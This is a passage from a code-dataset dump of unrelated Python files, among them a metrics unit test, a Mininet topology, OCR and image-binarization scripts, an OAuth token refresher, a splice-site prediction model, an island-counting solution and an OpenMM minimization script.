tp_val = metrics[0]\n tn_val = metrics[1]\n fp_val = metrics[2]\n fn_val = metrics[3]\n\n precision = metrics[4]\n recall = metrics[5]\n f1 = metrics[6]\n\n expected_precision = tp_val / (tp_val + fp_val)\n expected_recall = tp_val / (tp_val + fn_val)\n\n f1_divident = (expected_precision*expected_recall)\n f1_divisor = (expected_precision+expected_recall)\n expected_f1 = (2 * f1_divident / f1_divisor)\n\n self.assertGreaterEqual(tp_val, 0.0)\n self.assertGreaterEqual(fp_val, 0.0)\n self.assertGreaterEqual(fn_val, 0.0)\n self.assertGreaterEqual(tn_val, 0.0)\n\n # Compare to numpy estimation\n expected_tp = ref_true_pos(y, y_pred)\n expected_fp = ref_false_pos(y, y_pred)\n expected_fn = ref_false_neg(y, y_pred)\n expected_tn = ref_true_neg(y, y_pred)\n\n self.assertEqual(tp_val, expected_tp)\n self.assertEqual(fp_val, expected_fp)\n self.assertEqual(fn_val, expected_fn)\n self.assertEqual(tn_val, expected_tn)\n\n # Check summation\n self.assertEqual(sum(metrics[0:4]), samples)\n\n places = 4\n self.assertAlmostEqual(expected_precision, precision, places=places)\n self.assertAlmostEqual(expected_recall, recall, places=places)\n self.assertAlmostEqual(expected_f1, f1, places=places)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344678871","text":"from mininet.topo import Topo\n\nclass mytopo( Topo ):\n\n def __init__(self):\n\n #Init topo\n Topo.__init__(self)\n L1=2\n L2=L1*2\n L3=L2\n c=[]\n a=[]\n e=[]\n\n #add core ovs\n for i in range(L1):\n sw =self.addSwitch('c{}'.format(i+1))\n c.append(sw)\n\n #add aggregation ovs\n for i in range(L2):\n sw =self.addSwitch('a{}'.format(L1+i+1))\n a.append(sw)\n\n #add edge ovs\n for i in range(L3):\n sw =self.addSwitch('e{}'.format(L1+L2+i+1))\n e.append(sw)\n\n #add links between core and aggregation ovs\n for i in range(L1):\n sw1 = c[i]\n for sw2 in a[i/2::L1/2]:\n self.addLink(sw2,sw1)\n\n #add links between aggregation and edge ovs\n for i in range(0,L2,2):\n for sw1 in a[i:i+2]:\n for sw2 in e[i:i+2]:\n self.addLink(sw2,sw1)\n\n #add links between hosts and edge ovs\n count = 1\n for sw1 in e:\n for i in range(2):\n host=self.addHost('h{}'.format(count))\n self.addLink(sw1,host)\n count = count + 1\n\ntopos={'mytopo':(lambda:mytopo())}\n\n","sub_path":"toposcript/mytopo.py","file_name":"mytopo.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64601924","text":"\n# annoying boilerplate\n# get access to other sub folders\nimport sys\nsys.path.append('..')\n\nfrom nhlscrapi._tools import build_enum\n \nStrength = build_enum('Even', 'PP', 'SH')\n\nclass Play(object):\n def __init__(self):\n self.play_num = 0\n self.period = 0\n self.strength = Strength.Even\n self.time = { \"min\": 20, \"sec\": 0 }\n self.vis_on_ice = { }\n self.home_on_ice = { }\n self.event = None","sub_path":"nhlscrapi/games/plays.py","file_name":"plays.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247363331","text":"#!/usr/bin/python3\n\"\"\" Binarize Image\n\nDESCRIPTION/CONTEXT\n-------------------\nMy friend didn't have a scanner so I helped him grayscale and apply\nthresholding to a camera picture of his document to give it the apperance of\na scanned image.\n\nWritten in python2.7\n- Dependecies - OpenCV\n\nINPUTS\n-----\nimage path\n\nOUTPUTS\n-------\nb/w images in ./temp-[IMAGENAME]\n\nRUN\n---\n $ ls\n binarize_image.py image1.jpg image2.JPH\n $ python binarize_image.py image1.JPG image2.JPG\n\nTO DO\n-----\nThis script still adds a little bit of noise to the final image.\n\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport cv2\n\ndef binarize_image(paths):\n images = [cv2.imread(path, 0) for path in paths]\n R1 = np.arange(3, 13, 2)\n R2 = np.arange(3, 11, 1)\n ii = 0\n\n for ii, img in enumerate(images):\n temp_dir_path = \"./temp-\"+str(img)\n os.mkdir(temp_dir_path)\n for r1 in R1:\n for r2 in R2:\n bin_img = cv2.adaptiveThreshold(img, 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY, r1, r2)\n filename = str(ii)+\"-\"+str(r1)+\"-\"+str(r2)+\".png\"\n filepath = os.path.join(temp_dir_path, filename)\n cv2.imwrite(filepath, bin_img)\n\nif __name__ == \"__main__\":\n paths = [\"./\"+str(x) for x in sys.argv if x != \"binarize_image.py\"]\n binarize_image(paths)\n","sub_path":"binarize_image.py","file_name":"binarize_image.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304222535","text":"import easyocr\nfrom easyocr import config as ocr_config\nimport sys\nimport os\n\nWARNING_BORDER = 0.75\n\n\ndef text_recognition(file_path : str, langs = ['en', 'ru']) -> list:\n \"\"\"return list of ([[x,y],[x,y],[x,y],[x,y]], text_str, probability) based on image\"\"\"\n reader = easyocr.Reader(langs)\n #paragraph = True -> ([[x,y],[x,y],[x,y],[x,y]], paragraph_text)\n #yep, huge chunk and no probabilities.... Can be usefull if you go for captcha or something short\n result = reader.readtext(file_path)\n return result\n\n\ndef get_file_path():\n path = sys.argv[1] if len(sys.argv) > 1 else None\n if not path or not os.path.exists(path): \n manually = input('Path not provided or not found. Want to provide it manually? (y/n)\\n')\n if manually.lower().startswith('y'):\n path = input('Path for image:\\n')\n while not os.path.exists(path):\n path = input(f\"Can't find path{path}. Enter path to image:\\n\")\n return path\n else:\n return None\n return path\n\n\ndef get_languages():\n \"\"\"Return list of selected languages based on sys.argv or else on user choice\"\"\"\n #langs = sys.argv[2:] if len(sys.argv) > 2 else ocr_config.all_lang_list\n #Note: yep, it can't use its' own list : some languages are not found\n langs = sys.argv[2:] if len(sys.argv) > 2 else None\n while not langs:\n langs = input(f'Languages not found. Provide at least one. Available*: {ocr_config.all_lang_list} \\n').split()\n langs = [x for x in langs if x in ocr_config.all_lang_list]\n if (not langs):\n print('Available languages not selected. Breaking routine...')\n return []\n return langs\n\n\ndef write_raw_result(write_path, ocr_raw_result, with_warnings = True):\n \"\"\"Write to a file all text from raw ocr result in one line, no new lines\"\"\"\n with open(write_path, 'w') as result_file:\n for item in ocr_raw_result:\n result_file.write(item[1])\n result_file.write(' ')\n if (with_warnings and len(item) > 1 and item[2] <= WARNING_BORDER):\n print('Warning border triggered for item:')\n print(item)\n\n\ndef get_lines_based_on_coords(ocr_result : str, warnings_on = False) -> list:\n \"\"\"Return list of lines based on coordinates of recognized text\n \n Expects list of ([[x,y],[x,y],[x,y],[x,y]], text_str, probability) to go through\n and try to make lines based on coordinates of recognized text. \n \"\"\"\n #([[238, 248], [320, 248], [320, 276], [238, 276]], 'Альфа\" ', 0.3207814442789472)\n if not ocr_result or len(ocr_result) == 0:\n return []\n x_now = ocr_result[0][0][0][0]\n #Note: if you would decide to work through y, then height_coef has to be around 0.5\n resulting_lines = []\n a_line = []\n for item in ocr_result:\n if warnings_on and item[2] <= WARNING_BORDER:\n print('Warning border triggered for item:')\n print(item)\n if item[0][0][0] < x_now:\n resulting_lines.append(' '.join(a_line))\n a_line = []\n x_now = item[0][0][0]\n a_line.append(item[1])\n #last line will not be added -> add manually\n if a_line:\n resulting_lines.append(' '.join(a_line))\n return resulting_lines\n\n\ndef write_lined_result(write_path, ocr_raw_result, with_warnings = False):\n lines_to_write = get_lines_based_on_coords(ocr_raw_result, with_warnings)\n if not lines_to_write:\n print('No lines to write to file...')\n return\n with open(write_path, 'w') as result_file:\n for i, val in enumerate(lines_to_write):\n result_file.write(str(i)+' ')\n result_file.write(val)\n result_file.write('\\n')\n\n\ndef main_routine():\n path = get_file_path()\n if not path:\n return\n langs = get_languages()\n if not langs:\n return\n result = text_recognition(path, langs)\n #write_raw_result(path+'_res.txt', result)\n write_lined_result(path+'_res.txt', result)\n\n\nif __name__=='__main__':\n #python3 script_name.py file_path lang1 lang2 ... langN\n #result will be written to _res.txt\n main_routine()\n print('Done')\n","sub_path":"ocr/easy_ocr/get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"174856570","text":"import argparse\nimport os\n\n\nfrom terminaltables import AsciiTable\n\n\ndef lines_count(input_file):\n counts = 0\n for _ in input_file:\n counts += 1\n\n return counts\n\n\ndef bytes_count(input_file_path):\n st = os.stat(input_file_path)\n\n return st.st_size\n\n\ndef longest_line(input_file):\n max_length_line = 0\n for line in input_file:\n length_line = len(line)\n if length_line > max_length_line:\n max_length_line = length_line\n\n return max_length_line\n\n\ndef word_counts(input_file):\n words = 0\n for line in input_file:\n words += len(line.split())\n\n return words\n\n\ndef character_counts(input_file):\n characters = 0\n for item in input_file:\n for word in item.split():\n characters += len(word)\n\n return characters\n\n\ndef parse_command_line():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--file\", type=str, help=\"input file path\")\n args = parser.parse_args()\n\n return args\n\n\ndef open_file():\n command_line_arg = parse_command_line()\n file_in_memory = []\n with open(command_line_arg.file, encoding='utf-8') as file:\n for line in file:\n file_in_memory.append(line)\n\n return file_in_memory\n\n\ndef main():\n data_to_process = open_file()\n path_to_file = parse_command_line()\n max_length_lines = longest_line(data_to_process)\n number_of_lines = lines_count(data_to_process)\n size_file = bytes_count(path_to_file.file)\n number_of_words = word_counts(data_to_process)\n characters_counts = character_counts(data_to_process)\n\n result = [\n [\"Max length of string characters\", max_length_lines],\n [\"Number of lines in file is\", number_of_lines],\n [\"File size is\", size_file],\n [\"Number of words in the file is\", number_of_words],\n [\"Character_counts in the file\", characters_counts]\n ]\n\n table = AsciiTable(result)\n table.inner_row_border = True\n print(table.table)\n\n\nif __name__ == \"__main__\":\n file_existence = parse_command_line()\n if os.path.isfile(file_existence.file):\n main()\n else:\n print(\"Please provide file path\")\n exit(0)\n","sub_path":"tasks/statistics_calculation_task.py","file_name":"statistics_calculation_task.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"560976219","text":"import settings\nimport time\nimport requests\nimport threading\n\ndef refreshtoken(isRefresh):\n response = \"\";\n if(isRefresh):\n response = requests.post('https://drchrono.com/o/token/', data={\n 'refresh_token': settings.REFRESH_TOKEN,\n 'grant_type': 'refresh_token',\n 'client_id': settings.SOCIAL_AUTH_DRCHRONO_KEY,\n 'client_secret': settings.SOCIAL_AUTH_DRCHRONO_SECRET,\n 'redirect_uri' : settings.LOGIN_REDIRECT_URL,\n })\n data = response.json();\n settings.ACCESS_TOKEN = data['access_token'];\n settings.REFRESH_TOKEN = data['refresh_token'];\n settings.EXPIRES_IN = data['expires_in'];\n else:\n response = requests.post('https://drchrono.com/o/revoke_token/', data={\n 'client_id': settings.SOCIAL_AUTH_DRCHRONO_KEY,\n 'client_secret': settings.SOCIAL_AUTH_DRCHRONO_SECRET,\n 'token': settings.ACCESS_TOKEN,\n });\n data = response.json()\n print (data)\n\n\ndef countdown_refresh_accesstoken(t):\n t = threading.Timer(t, refreshtoken(True))\n t.daemon = True\n t.start()\n","sub_path":"drchrono/refreshtoken.py","file_name":"refreshtoken.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490188220","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\n\n######################### Splice Deep Model Using Python ##########################\n# Author: Somayah.Albaradei@kaust.edu.sa\n \n# Advisor : vladimir.bajic@kaust.edu.sa \n \n \n# Done: May, 2019\n\n \n# Description\n# This script applys the trained Deep Splice models giving a DNA sequnce with length 602 and Splice site in 300-301 positions :...300N...SS... 300N... \n\n###############################################################################\n\n\n\n\n\n\n#import library \nimport pickle\nimport numpy as np\nfrom sys import argv\nimport time\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport warnings\nimport tensorflow as tf\nimport os\nfrom tensorflow.python.util import deprecation\ndeprecation._PRINT_DEPRECATION_WARNINGS = False\n\n# read fasta file and append each sequnce in a list and return that list\n\n\ndef TextToList(fileName):\n dna_list=[]\n with open(fileName) as file:\n \n for line in file:\n li=line.strip()\n if not li.startswith(\">\"):\n dna_list.append(line.rstrip(\"\\n\"))\n file.close()\n return dna_list\n\n\n\n\n# split regons around SS to Up stream and Down strem\n\n\ndef split_up_down(dna_list,sig_str,sig_end,begin,end):\n down=[]\n up=[]\n #short_dna=[]\n for s in range(len(dna_list)):\n up.append(dna_list[s][begin:sig_str])\n down.append(dna_list[s][sig_end:end])\n return up,down\n\n\n# encode sequnce to image (4*L)\n\n\ndef EncodeSeqToMono_4D(dna_list):\n data=[]\n image=np.zeros((4,len(dna_list[0])))\n \n alphabet = 'ACGT'\n char_to_int = dict((c, i) for i, c in enumerate(alphabet))\n int_to_char = dict((i, c) for i, c in enumerate(alphabet))\n for i in range(len(dna_list)):\n image=np.zeros((4,len(dna_list[0])))\n x = dna_list[i]\n integer_encoded = [char_to_int[char] for char in x]\n \n \n \n j=0\n for value in integer_encoded:\n if (value==3):\n image[value][j] += 1\n if (value==2):\n image[value][j] += 0.5\n \n image[value][j] +=1\n j=j+1\n \n data.append(img_to_array(image))\n \n return data\n\n\n# encode sequnce to image (64*L)\n\n\ndef EncodeSeqToTri_64D(dna_list):\n seq=dna_list[0]\n n=len(seq)\n profile = { 'AAA':[0]*n,'ACA':[0]*n ,'AGA':[0]*n,'ATA':[0]*n,\n 'CAA':[0]*n,'CCA':[0]*n ,'CGA':[0]*n,'CTA':[0]*n,\n 'GAA':[0]*n,'GCA':[0]*n ,'GGA':[0]*n,'GTA':[0]*n,\n 'TAA':[0]*n,'TCA':[0]*n ,'TGA':[0]*n,'TTA':[0]*n,\n\n 'AAC':[0]*n,'ACC':[0]*n ,'AGC':[0]*n,'ATC':[0]*n,\n 'CAC':[0]*n,'CCC':[0]*n ,'CGC':[0]*n,'CTC':[0]*n,\n 'GAC':[0]*n,'GCC':[0]*n ,'GGC':[0]*n,'GTC':[0]*n,\n 'TAC':[0]*n,'TCC':[0]*n ,'TGC':[0]*n,'TTC':[0]*n,\n\n 'AAG':[0]*n,'ACG':[0]*n ,'AGG':[0]*n,'ATG':[0]*n,\n 'CAG':[0]*n,'CCG':[0]*n ,'CGG':[0]*n,'CTG':[0]*n,\n 'GAG':[0]*n,'GCG':[0]*n ,'GGG':[0]*n,'GTG':[0]*n,\n 'TAG':[0]*n,'TCG':[0]*n ,'TGG':[0]*n,'TTG':[0]*n,\n\n 'AAT':[0]*n,'ACT':[0]*n ,'AGT':[0]*n,'ATT':[0]*n,\n 'CAT':[0]*n,'CCT':[0]*n ,'CGT':[0]*n,'CTT':[0]*n,\n 'GAT':[0]*n,'GCT':[0]*n ,'GGT':[0]*n,'GTT':[0]*n,\n 'TAT':[0]*n,'TCT':[0]*n ,'TGT':[0]*n,'TTT':[0]*n}\n\n idx=list(profile.keys())\n #print(idx)\n data=[]\n labels=[]\n image=np.zeros((64,n))\n for seq in dna_list:\n for i in range(len(seq)-2):\n tri=seq[i]+seq[i+1]+seq[i+2]\n if tri in profile.keys():\n image[idx.index(tri)][i] += 1\n #print(idx.index(tri))\n \n data.append(img_to_array(image))\n image=np.zeros((64,n))\n\n return data\n\n\n\n# check seqence and make sure it contains ACGT letters only\n\n\ndef RemoveNonAGCT(dna_list):\n chars = set('ACGT')\n dna_listACGT=[]\n for s in dna_list:\n flag=0\n for c in s:\n if c not in chars:\n flag=-1\n if flag==0:\n dna_listACGT.append(s)\n \n return dna_listACGT \n\n\n\n# load models\n\n\ndef load_pickle(pickle_file):\n try:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f)\n except UnicodeDecodeError as e:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f, encoding='latin1')\n except Exception as e:\n print('Unable to load data ', pickle_file, ':', e)\n raise\n return pickle_data\n\n\n\n# main function\n\ndef main(org='hs', Input='DoSS_test.fa', Output='1'): \n # variables input\n parameter_dict = {}\n for user_input in argv[1:]: \n if \"=\" not in user_input: \n continue\n varname = user_input.split(\"=\")[0] \n varvalue = user_input.split(\"=\")[1] \n parameter_dict[varname] = varvalue\n\n if \"org\" in parameter_dict:\n print(\"Welcome to splice deep program : \") \n print(\"organism is: \" + parameter_dict[\"org\"])\n else: \n print(\"User did not give a value for organism\")\n \n if \"Input\" in parameter_dict: \n print(\"Input fasta file is: \" + parameter_dict[\"Input\"])\n else: #Or if the user did not define var1 in their list:\n print(\"User did not give a value for file name\")\n \n \n #########################################################\n # set the windosize and SS position\n begin=0\n end=602\n sig_str=300\n sig_end=302\n \n org= parameter_dict[\"org\"]\n \n \n \n global_model = load_model('./models/don_global_model_'+org)\n up_model = load_model('./models/don_up_model_'+org)\n down_model = load_model('./models/don_down_model_'+org)\n finalmodel='./models/don_splicedeep_'+org+'.pkl'\n final_model = load_pickle(finalmodel)\n Data=TextToList('./Data/'+parameter_dict[\"Input\"])\n start = time. time()\n\n test_images=EncodeSeqToMono_4D(Data)\n\n test= np.array(test_images,)\n\n prediction = global_model.predict(test)\n\n globalfeatures_t=prediction.tolist()\n\n # split up and down\n\n test_up, test_down=split_up_down(Data,sig_str,sig_end,begin,end)\n\n\n\n # up model\n\n test_images=EncodeSeqToTri_64D(test_up)\n test= np.array(test_images,)\n\n prediction = up_model.predict(test)\n\n upfeatures_t=prediction.tolist()\n\n #down model\n\n test_images=EncodeSeqToMono_4D(test_down)\n test= np.array(test_images,)\n\n prediction = down_model.predict(test)\n\n dwonfeatures_t=prediction.tolist()\n\n # final model\n d_t=np.zeros((len(Data),6))\n idx=0\n\n\n for idx in range(len(Data)):\n\n d_t[idx][0]=globalfeatures_t[idx][0]\n\n d_t[idx][1]=globalfeatures_t[idx][1]\n\n\n d_t[idx][2]=upfeatures_t[idx][0]\n\n d_t[idx][3]=upfeatures_t[idx][1]\n\n d_t[idx][4]=dwonfeatures_t[idx][0]\n d_t[idx][5]=dwonfeatures_t[idx][1]\n\n\n pred=final_model.predict(d_t)\n \n\n endtime = time. time()\n seconds=endtime - start\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n print (\"Time: %d:%02d:%02d\" % (h, m, s))\n \n \n \n np.savetxt('splicedeep_DoSS_output_'+ parameter_dict[\"Output\"], pred, fmt='%i')\n \n print('see prediction in splicedeep_DoSS_output_'+parameter_dict[\"Output\"]+'.txt file')\n\n\n\n# In[43]:\n\n\n\n\nif __name__ == \"__main__\": \n warnings.filterwarnings(\"ignore\")\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n main(argv)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Splice_Deep_Donor.py","file_name":"Splice_Deep_Donor.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468306739","text":"import pandas as pd\nimport datetime\n\ndef remove_timezone(data):\n if not type(data.starttime[0]) == datetime.datetime:\n data = convert_timestamps_to_datetime(data)\n data['starttime'] = data['starttime'].apply(lambda dt: dt.replace(tzinfo=None))\n data['endtime'] = data['endtime'].apply(lambda dt: dt.replace(tzinfo=None))\n return data\n\n\ndef convert_timestamps_to_datetime(data):\n print(\"converting start and end timestamps to datetime objects\")\n if not type(data['starttime'][0]) == datetime.datetime:\n data['starttime'] = pd.to_datetime(data['starttime'])\n if not type(data['endtime'][0]) == datetime.datetime:\n data['endtime'] = pd.to_datetime(data['endtime'])\n return data\n","sub_path":"Scripts/utils/temporal_utils.py","file_name":"temporal_utils.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289527206","text":"# 方法一: dfs\nclass Solution:\n def closedIsland(self, grid: List[List[int]]) -> int:\n if not grid or not grid[0]: return 0\n rows, cols = len(grid), len(grid[0])\n ans = 0\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == 0:\n ans += self._dfs(r, c, grid)\n return ans\n\n def _dfs(self, r, c, grid):\n if r < 0 or r >= len(grid) or c < 0 or c >= len(grid[0]):\n return 0\n if grid[r][c] == 1:\n return 1\n grid[r][c] = 1\n ret = 1\n for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):\n ret = min(ret, self._dfs(nr, nc, grid))\n return ret\n \n# 方法二: bfs\nclass Solution:\n def closedIsland(self, grid: List[List[int]]) -> int:\n if not grid or not grid[0]: return 0\n rows, cols = len(grid), len(grid[0])\n ans = 0\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == 0:\n ans += self._bfs(r, c, grid)\n return ans\n\n def _bfs(self, r, c, grid):\n d = collections.deque()\n d.append((r, c))\n ret = 1\n rows, cols = len(grid), len(grid[0])\n while d:\n r, c = d.popleft()\n grid[r][c] = 1\n for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):\n if nr < 0 or nr >= rows or nc < 0 or nc >= cols:\n ret = 0\n continue\n if grid[nr][nc] == 0:\n d.append((nr, nc))\n return ret\n","sub_path":"1254_NumberofClosedIslands/closedIsland.py","file_name":"closedIsland.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466903690","text":"import json\n\ndef merge(id_and_clusters):\n the_id = id_and_clusters.split('_')[0]\n clusters = id_and_clusters.split('_')[1]\n jsonFileName = \"sourcedata/\" + the_id + \"_raw.json\"\n idFileName = \"sourcedata/\" + the_id + \"_matrixID.json\"\n clusterFileName = \"sourcedata/\" + the_id + \"_\" + clusters + \".txt\"\n f = open(idFileName, 'r')\n text = f.read()\n nodeId_2_matrixId = json.loads(text)\n f.close()\n f = open(clusterFileName, 'r')\n matrixId_2_cluster = ['do_not_use_index_0']\n for line in f.readlines():\n line = line[:-1]\n if line == \"\":\n break\n matrixId_2_cluster.append(line)\n f.close()\n f = open(jsonFileName, 'r')\n txt = f.read()\n source_dict = json.loads(txt.decode(\"utf8\", 'replace'))\n f.close()\n nodes = source_dict.get('node')\n for key in nodes:\n node = nodes[key]\n if node['id'] == the_id:\n node['cluster'] = '300'\n print(\"root node found ...\")\n else:\n node['cluster'] = matrixId_2_cluster[ nodeId_2_matrixId[node['id']] ]\n outFile = open(\"data/\" + id_and_clusters + \".json\", 'w')\n str2write = json.dumps(source_dict, ensure_ascii = False)\n outFile.write(str2write)\n outFile.close()\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76756770","text":"from __future__ import print_function\nfrom simtk.openmm.app import *\nfrom simtk.openmm import *\nfrom simtk.unit import *\nfrom sys import stdout\nfrom time import gmtime, strftime\nfrom datetime import datetime\nimport numpy as np\n\ndef angle(p):\n a,b,c=p[0],p[1],p[2]\n ba = a - b\n bc = c - b\n cosine_angle = np.dot(ba, bc) / (np.linalg.norm(ba) * np.linalg.norm(bc))\n angle = np.arccos(cosine_angle)\n return np.degrees(angle)\n\ndef dihedral(p):\n b = p[:-1] - p[1:]\n b[0] *= -1\n v = np.array( [ v - (v.dot(b[1])/b[1].dot(b[1])) * b[1] for v in [b[0], b[2]] ] )\n # Normalize vectors\n v /= np.sqrt(np.einsum('...i,...i', v, v)).reshape(-1,1)\n b1 = b[1] / np.linalg.norm(b[1])\n x = np.dot(v[0], v[1])\n m = np.cross(v[0], b1)\n y = np.dot(m, v[1])\n return np.degrees(np.arctan2( y, x ))\n\ntemperature=300*kelvin\npdbin=sys.argv[1]\nffin=sys.argv[2]\npdbout=sys.argv[3]\npdb = PDBFile(pdbin)\nstrdir = ''\n\ninteg_md = DrudeLangevinIntegrator(temperature, 1/picosecond, 1*kelvin, 1/picosecond, 0.001*picoseconds)\ninteg_md.setMaxDrudeDistance(0.02) # this should prevent polarization catastrophe during equilibration, but shouldn't affect results afterwards ( 0.2 Angstrom displacement is very large for equil. Drudes)\n\npdb.topology.loadBondDefinitions('sapt_residues_choline.xml')\npdb.topology.createStandardBonds();\n\nmodeller = Modeller(pdb.topology, pdb.positions)\nforcefield = ForceField(ffin)\nmodeller.addExtraParticles(forcefield)\n#PDBFile.writeFile(modeller.topology, modeller.positions, open('init.pdb', 'w'))\n\nsystem = forcefield.createSystem(modeller.topology, constraints=None, rigidWater=True)\nnbondedForce = [f for f in [system.getForce(i) for i in range(system.getNumForces())] if type(f) == NonbondedForce][0]\ncustomNonbondedForce = [f for f in [system.getForce(i) for i in range(system.getNumForces())] if type(f) == CustomNonbondedForce][0]\ndrudeForce = [f for f in [system.getForce(i) for i in range(system.getNumForces())] if type(f) == DrudeForce][0]\nnbondedForce.setNonbondedMethod(NonbondedForce.NoCutoff)\ncustomNonbondedForce.setNonbondedMethod(min(nbondedForce.getNonbondedMethod(),NonbondedForce.NoCutoff))\nprint('nbMethod : ', customNonbondedForce.getNonbondedMethod())\n\nfor i in range(system.getNumForces()):\n f = system.getForce(i)\n type(f)\n f.setForceGroup(i)\n\ntotmass = 0.*dalton\nfor i in range(system.getNumParticles()):\n totmass += system.getParticleMass(i)\nsimmd = Simulation(modeller.topology, system, integ_md)\nsimmd.context.setPositions(modeller.positions)\nsimmd.context.reinitialize()\nsimmd.context.setPositions(modeller.positions)\n\nprint('Minimizing...')\nstate = simmd.context.getState(getEnergy=True,getForces=True,getPositions=True)\nposition = state.getPositions()\nnppos=state.getPositions(asNumpy=True)\nprint(str(state.getKineticEnergy()))\nprint(str(state.getPotentialEnergy()))\n\na1atoms=nppos[[14,13,15],:]/(1.0*nanometer)\na2atoms=nppos[[18,17,19],:]/(1.0*nanometer)\na3atoms=nppos[[0,13,16],:]/(1.0*nanometer)\nd1atoms=nppos[[14,13,16,19],:]/(1.0*nanometer)\nd2atoms=nppos[[0,13,16,19],:]/(1.0*nanometer)\nprint('chain Bond angle HCH (beforemin) : ',angle(a1atoms),' ',angle(a2atoms))\nprint('Bond angle NCC (beforemin) : ',angle(a3atoms))\nprint('Dihedral angle HCCO (beforemin) : ',dihedral(d1atoms))\nprint('Dihedral angle NCCO (beforemin) : ',dihedral(d2atoms))\n\nfor i in range(system.getNumForces()):\n f = system.getForce(i)\n print(type(f), str(simmd.context.getState(getEnergy=True, groups=2**i).getPotentialEnergy()))\n\n#PDBFile.writeFile(simmd.topology, position, open(strdir+'beforemin.pdb', 'w'))\nprint('Wrote initial positions')\nsimmd.minimizeEnergy(maxIterations=2000)\n\nprint('Minimization finished !')\nstate = simmd.context.getState(getEnergy=True,getForces=True,getVelocities=True,getPositions=True)\nprint(numpy.max(state.getVelocities()*picosecond/nanometer))\nprint(str(state.getKineticEnergy()))\nprint(str(state.getPotentialEnergy()))\nfor i in range(system.getNumForces()):\n f = system.getForce(i)\n print(type(f), str(simmd.context.getState(getEnergy=True, groups=2**i).getPotentialEnergy()))\n\nposition = state.getPositions()\n#print(position)\nnppos=state.getPositions(asNumpy=True)\na1atoms=nppos[[14,13,15],:]/(1.0*nanometer)\na2atoms=nppos[[18,17,19],:]/(1.0*nanometer)\na3atoms=nppos[[0,13,16],:]/(1.0*nanometer)\nd1atoms=nppos[[14,13,16,19],:]/(1.0*nanometer)\nd2atoms=nppos[[0,13,16,19],:]/(1.0*nanometer)\nprint('chain Bond angle HCH (aftermin) : ',angle(a1atoms),' ',angle(a2atoms))\nprint('Bond angle NCC (beforemin) : ',angle(a3atoms))\nprint('Dihedral angle HCCO (aftermin) : ',dihedral(d1atoms))\nprint('Dihedral angle NCCO (aftermin) : ',dihedral(d2atoms))\n\nPDBFile.writeFile(simmd.topology, position, open(strdir+pdbout, 'w'))\n\n#*************************************\n#*************************************************\n# ChangYun created the DrudeDataReporter class, we need to pull this into this OpenMM install if we want to use it\n#*************************************************\n#simmd.reporters.append(DrudeDataReporter(strdir+'md_nvt.log', 1000, step=True, time=True, potentialEnergy=True, kineticEnergy=True, totalEnergy=True, temperature=True, langevin=True, density=False,speed=True))\n#simmd.reporters.append(DrudeDataReporter(strdir+'md_nvt_temp.log', 10000, step=True, time=True, potentialEnergy=True, kineticEnergy=True, totalEnergy=True, temperature=True, langevin=True, drudeTemperature=True,density=False,speed=True))\n#simmd.reporters[2].report(simmd,state)\n\n#for i in range(simmd.system.getNumForces()):\n# if type(simmd.system.getForce(i)) == MonteCarloBarostat:\n# simmd.system.removeForce(i)\nprint('Done!')\n\nexit()\n","sub_path":"py_development/data_process/sapt_dimer/monmin_test.py","file_name":"monmin_test.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"146870864","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport geopy\nfrom geopy.distance import vincenty\nsource_path = os.path.join(os.getcwd(),'Source')\nmodel_path = os.path.join(os.getcwd(),'Model')\nplayer_pattern=pd.read_csv(os.path.join(source_path,'player_pattern.csv'))\nfield = pd.read_excel(os.path.join(source_path,'field.xlsx'))\ndef calculateDistance(rowA,rowB):\n a = rowA['latitude'],rowA['longitude']\n b = rowB['latitude'],rowB['longitude']\n return vincenty(a, b).kilometers\n#算每個人在各時段機率\ndef calculate(player):\n dataset = player_pattern[player_pattern['player']==player]\n p_0_0 